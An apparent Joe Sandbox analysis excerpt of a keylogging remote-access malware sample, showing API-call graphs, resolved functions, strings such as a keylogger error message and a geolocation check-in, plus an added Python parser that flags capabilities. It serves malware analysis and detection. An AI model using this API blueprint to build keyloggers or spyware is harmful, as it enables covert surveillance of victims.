calls 48784->48785 48786 401f99 48785->48786 48786->48781 48787->48781 48788->48781 48789->48781 48790->48770 48791->48781 48792->48781 48795 40a776 Sleep 48794->48795 48814 40a6b0 48795->48814 48797 40a2c1 48798 40a7aa 48799 40a7b6 CreateDirectoryW 48798->48799 48806 40a788 48799->48806 48800 40a7c7 GetFileAttributesW 48800->48806 48801 401e65 22 API calls 48801->48806 48802 40a7de SetFileAttributesW 48802->48806 48804 40a858 PathFileExistsW 48804->48806 48805 4020df 11 API calls 48805->48806 48806->48795 48806->48797 48806->48798 48806->48800 48806->48801 48806->48802 48806->48804 48806->48805 48808 4020b7 28 API calls 48806->48808 48809 40a961 SetFileAttributesW 48806->48809 48810 406e13 28 API calls 48806->48810 48811 401fe2 28 API calls 48806->48811 48813 401fd8 11 API calls 48806->48813 48827 41c482 48806->48827 48837 41c516 CreateFileW 48806->48837 48845 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48806->48845 48808->48806 48809->48806 48810->48806 48811->48806 48813->48806 48815 40a75d 48814->48815 48817 40a6c6 48814->48817 48815->48806 48816 40a6e5 CreateFileW 48816->48817 48818 40a6f3 GetFileSize 48816->48818 48817->48816 48819 40a728 CloseHandle 48817->48819 48820 40a73a 48817->48820 48821 40a716 48817->48821 48822 40a71d Sleep 48817->48822 48818->48817 48818->48819 48819->48817 48820->48815 48824 409097 28 API calls 48820->48824 48846 40b117 84 API calls 48821->48846 48822->48819 48825 40a756 48824->48825 48826 40a1b4 124 API calls 48825->48826 48826->48815 48828 41c495 CreateFileW 48827->48828 48830 41c4d2 48828->48830 48831 41c4ce 48828->48831 48832 41c4f2 WriteFile 48830->48832 48833 41c4d9 SetFilePointer 48830->48833 48831->48806 48835 41c505 48832->48835 48836 41c507 CloseHandle 48832->48836 48833->48832 48834 41c4e9 CloseHandle 48833->48834 48834->48831 48835->48836 48836->48831 48838 41c540 GetFileSize 48837->48838 48839 41c53c 48837->48839 48847 40244e 48838->48847 48839->48806 48841 41c554 48842 41c566 ReadFile 
48841->48842 48843 41c573 48842->48843 48844 41c575 CloseHandle 48842->48844 48843->48844 48844->48839 48845->48806 48846->48822 48848 402456 48847->48848 48850 402460 48848->48850 48851 402a51 28 API calls 48848->48851 48850->48841 48851->48850 48854 40322e 48853->48854 48863 403618 48854->48863 48856 40323b 48856->48663 48858 40326e 48857->48858 48859 402252 11 API calls 48858->48859 48860 403288 48859->48860 48861 402336 11 API calls 48860->48861 48862 403031 48861->48862 48862->48239 48864 403626 48863->48864 48865 403644 48864->48865 48866 40362c 48864->48866 48868 40365c 48865->48868 48869 40369e 48865->48869 48874 4036a6 28 API calls 48866->48874 48872 4027e6 28 API calls 48868->48872 48873 403642 48868->48873 48875 4028a4 22 API calls 48869->48875 48872->48873 48873->48856 48874->48873 48877 404186 48876->48877 48878 402252 11 API calls 48877->48878 48879 404191 48878->48879 48887 4041bc 48879->48887 48882 4042fc 48898 404353 48882->48898 48884 40430a 48885 403262 11 API calls 48884->48885 48886 404319 48885->48886 48886->48249 48888 4041c8 48887->48888 48891 4041d9 48888->48891 48890 40419c 48890->48882 48892 4041e9 48891->48892 48893 404206 48892->48893 48894 4041ef 48892->48894 48895 4027e6 28 API calls 48893->48895 48896 404267 28 API calls 48894->48896 48897 404204 48895->48897 48896->48897 48897->48890 48899 40435f 48898->48899 48902 404371 48899->48902 48901 40436d 48901->48884 48903 40437f 48902->48903 48904 404385 48903->48904 48905 40439e 48903->48905 48968 4034e6 28 API calls 48904->48968 48906 402888 22 API calls 48905->48906 48907 4043a6 48906->48907 48909 404419 48907->48909 48910 4043bf 48907->48910 48969 4028a4 22 API calls 48909->48969 48913 4027e6 28 API calls 48910->48913 48921 40439c 48910->48921 48913->48921 48921->48901 48968->48921 48976 43ab1a 48970->48976 48974 4138f4 48973->48974 48975 4138ca RegSetValueExA RegCloseKey 48973->48975 48974->48268 48975->48974 48979 43aa9b 48976->48979 48978 40170d 48978->48266 48980 43aaaa 
                                                  [Control-flow graph edge list omitted. The serialized graph covers the socket setup path (WSAStartup, socket, CreateEventW, WSAGetLastError, WSASetLastError), the foreground-window title capture (GetForegroundWindow, GetWindowTextW), the GetSystemDirectoryA/LoadLibraryA/GetProcAddress/FreeLibrary probing in 414dc1, the CryptAcquireContextA/CryptGenRandom/CryptReleaseContext path in 4338c8, the send/recv wrappers at 426cdc and 426c6d, and the Sleep/TerminateProcess/WaitForSingleObject/ExitProcess path in 40f7fd; the API calls are listed per function below.]

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                  • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                  • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                  • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                  Control-flow Graph

                                                  control_flow_graph (basic blocks, the APIs they call, and their successors):
                                                  • 1288 (40a2f3-40a30a) -> 1289, 1290
                                                  • 1289 (40a30c-40a326): GetModuleHandleA, SetWindowsHookExA -> 1290, 1293
                                                  • 1290 (40a36e-40a37e): GetMessageA -> 1291, 1292
                                                  • 1291 (40a380-40a398): TranslateMessage, DispatchMessageA -> 1290, 1292
                                                  • 1292 (40a39a) -> 1294
                                                  • 1293 (40a328-40a36c): GetLastError, call 41bc1f, call 4052fd, call 402093, call 41b580, call 401fd8 -> 1294
                                                  • 1294 (40a39c-40a3a1), no successors
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetMessageA.USER32 ref: 0040A376
                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                  • Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                  Control-flow Graph

                                                  control_flow_graph (basic blocks, the APIs they call, and their successors):
                                                  • 1370 (41b411-41b454): call 4020df, call 43bda0, InternetOpenW, InternetOpenUrlW -> 1375
                                                  • 1375 (41b456-41b477): InternetReadFile -> 1376, 1377
                                                  • 1376 (41b479-41b499): call 4020b7, call 403376, call 401fd8 -> 1377
                                                  • 1377 (41b49d-41b4a0) -> 1379, 1380
                                                  • 1379 (41b4a2-41b4a4) -> 1375, 1380
                                                  • 1380 (41b4a6-41b4b3): InternetCloseHandle * 2, call 43bd9b -> 1383
                                                  • 1383 (41b4b8-41b4c2), no successors
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                  • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.1.1 Pro$override$pth_unenc
                                                  • API String ID: 2281282204-2344886030
                                                  • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                  • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
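The four function blocks above are the raw material behind several verdicts in the report's signature list: the low-level keyboard hook (SetWindowsHookExA with first argument 0000000D, which is WH_KEYBOARD_LL, followed by a GetMessageA/TranslateMessage/DispatchMessageA pump), the geoplugin.net check-in over WinINet, the LoadLibraryA/GetModuleHandleA plus GetProcAddress resolution of NtSuspendProcess, SetProcessDEPPolicy and the Restart Manager exports, and the Sleep(00000BB8) that precedes ExitProcess. The following Python is an added example, not code from Joe Sandbox or from the analysed sample: it parses report lines of this shape, decodes the raw hex constants, pairs each library load with the GetProcAddress that follows it, and emits behaviour flags. The constant values and the flag names are this example's own assumptions; the input is a subset of the lines copied from the listings above.

```python
"""Parse the per-function API listings of a Joe Sandbox report into records and
derive behaviour flags from them.  Added example, not code from the Joe Sandbox
report or from the analysed sample; the constant table and flag names are this
example's own assumptions, and the input lines are copied from the listings above."""
import re
from collections import namedtuple

# Constructed input: a subset of the API lines copied from the listings above.
SAMPLE_LISTING = """
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetMessageA.USER32 ref: 0040A376
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
• Sleep.KERNEL32(00000BB8), ref: 0040F896
• ExitProcess.KERNEL32 ref: 0040F905
"""

# One report line: ApiName.MODULE(arg,arg,...), ref: ADDRESS (the argument list may be absent)
LINE_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
ApiCall = namedtuple("ApiCall", "api module args ref")

def parse_listing(text):
    """Turn report lines into ApiCall records, keeping the report's order."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls

# Symbolic names for argument slots the report prints as raw hex:
# (api, argument index) -> {value: name}.  Assumed Win32 constant values.
ARG_NAMES = {
    ("SetWindowsHookExA", 0): {0x0D: "WH_KEYBOARD_LL"},
    ("RegOpenKeyExA", 0): {0x80000001: "HKEY_CURRENT_USER"},
    ("RegOpenKeyExA", 3): {0x20019: "KEY_READ"},
    ("InternetOpenUrlW", 4): {0x80000000: "INTERNET_FLAG_RELOAD"},
}

def decode_args(call):
    """Replace raw hex arguments with symbolic names where the slot is known."""
    out = []
    for i, a in enumerate(call.args):
        try:
            value = int(a, 16)
        except ValueError:            # '?' or a string literal such as a URL
            out.append(a)
            continue
        name = ARG_NAMES.get((call.api, i), {}).get(value)
        if name is None and call.api == "Sleep" and i == 0:
            name = f"{value} ms"      # Sleep(0xBB8) is a 3 s delay
        out.append(name or a)
    return out

def dynamic_resolutions(calls):
    """Pair each LoadLibraryA/GetModuleHandleA with the GetProcAddress right after it.
    GetModuleHandleA lines carry the function name as second argument; LoadLibraryA
    lines do not (the name sits in a register), so the name is None there."""
    resolved, pending = [], None
    for c in calls:
        if c.api in ("LoadLibraryA", "GetModuleHandleA") and c.args and c.args[0] not in ("00000000", "?"):
            name = c.args[1] if len(c.args) > 1 else None
            pending = (c.args[0], None if name in ("00000000", "?") else name)
        elif c.api == "GetProcAddress" and pending is not None:
            resolved.append(pending)
            pending = None
        else:
            pending = None            # any other call breaks the load/resolve pair
    return resolved

def flag_capabilities(calls):
    """Derive behaviour flags of the kind the report's signatures raise."""
    flags = set()
    resolved = dynamic_resolutions(calls)
    names = {fn for _, fn in resolved if fn}
    if resolved:
        flags.add("dynamic_api_resolution")
    if names & {"NtSuspendProcess", "NtResumeProcess"}:
        flags.add("process_suspend_resume")
    if "SetProcessDEPPolicy" in names:
        flags.add("dep_policy_change")
    if any(mod.lower() == "rstrtmgr" for mod, _ in resolved):
        flags.add("restart_manager")
    longest_sleep_ms = 0
    for c in calls:
        if c.api == "SetWindowsHookExA" and decode_args(c)[:1] == ["WH_KEYBOARD_LL"]:
            flags.add("low_level_keyboard_hook")
        if c.api.startswith("Internet") and any("geoplugin.net" in a for a in c.args):
            flags.add("geolocation_lookup")
        if c.api == "Sleep" and c.args and c.args[0] != "?":
            longest_sleep_ms = max(longest_sleep_ms, int(c.args[0], 16))
    if longest_sleep_ms >= 1000 and any(c.api == "ExitProcess" for c in calls):
        flags.add("delayed_exit")
    return flags
```

Two details matter when this is run over a full function block. A GetModuleHandleA that is not immediately followed by GetProcAddress is deliberately dropped, which is what happens to the GetModuleHandleA(00000000,00000000) that precedes SetWindowsHookExA (it only fetches the hook module handle). LoadLibraryA resolutions come back with a None function name because the report shows the name only when it is a visible string argument; the String ID line of the resolver block above is where the remaining names (NtUnmapViewOfSection, IsUserAnAdmin, GetExtendedTcpTable and the rest) can be recovered.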
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0092A308), ref: 004338DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                  Strings
                                                  • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem
                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                  • API String ID: 2086374402-595813830
                                                  • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                  • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                  • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                  • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction Fuzzy Hash:

                                                  Control-flow Graph

                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 144 40eca4-40ecaa 140->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 
